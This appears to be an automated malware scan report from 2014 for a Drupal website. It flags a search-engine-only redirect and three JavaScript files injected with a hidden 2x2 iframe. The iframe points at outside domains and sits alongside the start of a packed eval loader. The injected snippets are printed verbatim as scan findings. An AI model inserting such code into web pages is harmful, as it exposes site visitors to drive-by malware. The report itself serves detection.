Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://godihavenoidea.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: godihavenoidea.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sat, 06 Sep 2014 06:44:23 GMT Location: http://clubatleticoestrada.org.ar/awas.html?h=1039840 Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 06 Sep 2014 07:44:23 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://godihavenoidea.com/ | 200 OK Content-Length: 12671 Content-Type: text/html | clean |
http://godihavenoidea.com/misc/jquery.js?u | 200 OK Content-Length: 31260 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awas.html?j=1039840></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b' Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://clubatleticoestrada.org.ar/awas.html?j=1039840 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awas.html?j=1039840> | ||
http://godihavenoidea.com/misc/drupal.js?u | 200 OK Content-Length: 10004 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awas.html?j=1039840></iframe>');
var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} }; Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById; Drupal.attachBehaviors } return message; } if (Drupal.jsEnabled) { $(document.documentElement).addClass('js'); document.cookie = 'has_js=1; path=/'; $(document).ready(function() { Drupal.attachBehaviors(this); }); } Drupal.theme.prototype = { placeholder: function(str) { return '<em>' + Drupal.checkPlain(str) + '</em>'; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://clubatleticoestrada.org.ar/awas.html?j=1039840 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awas.html?j=1039840> | ||
http://godihavenoidea.com/profiles/prosepoint/modules/poormanscron/poormanscron.js?u | 200 OK Content-Length: 598 Content-Type: application/x-javascript | clean |
http://godihavenoidea.com/about | 200 OK Content-Length: 10009 Content-Type: text/html | clean |
http://godihavenoidea.com/contact | 200 OK Content-Length: 9569 Content-Type: text/html | clean |
http://godihavenoidea.com/misc/textarea.js?u | 200 OK Content-Length: 1492 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1039840></iframe>');
Drupal.behaviors.textarea = function(context) { $('textarea.resizable:not(.textarea-processed)', context).each(function() { if ($(this).is(('textarea.teaser:not(.teaser-processed)'))) { return false; } var textarea = $(this).addClass('textarea-processed'), stati textarea.css('opacity', 0.25); $(document).mousemove(performDrag).mouseup(endDrag); return false; } function performDrag(e) { textarea.height(Math.max(32, staticOffset + e.pageY) + 'px'); return false; } function endDrag(e) { $(document).unbind("mousemove", performDrag).unbind("mouseup", endDrag); textarea.css('opacity', 1); } }); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1039840 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1039840> | ||
http://godihavenoidea.com/user/login | 200 OK Content-Length: 7912 Content-Type: text/html | clean |
http://godihavenoidea.com/news | 200 OK Content-Length: 12675 Content-Type: text/html | clean |
http://godihavenoidea.com/mymagazine | 200 OK Content-Length: 12692 Content-Type: text/html | clean |
http://godihavenoidea.com/my_blog | 200 OK Content-Length: 12354 Content-Type: text/html | clean |
http://godihavenoidea.com/profiles/prosepoint/modules/views/js/base.js?u | 200 OK Content-Length: 3504 Content-Type: application/x-javascript | clean |
http://godihavenoidea.com/profiles/prosepoint/modules/views/js/ajax_view.js?u | 200 OK Content-Length: 6805 Content-Type: application/x-javascript | clean |
http://godihavenoidea.com/story/sample-news-story-1 | 200 OK Content-Length: 15739 Content-Type: text/html | clean |
http://godihavenoidea.com/channel/1/stories | 200 OK Content-Length: 12337 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=godihavenoidea.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://godihavenoidea.com/
Result: godihavenoidea.com is not infected or malware details are not published yet.
Result: godihavenoidea.com is not infected or malware details are not published yet.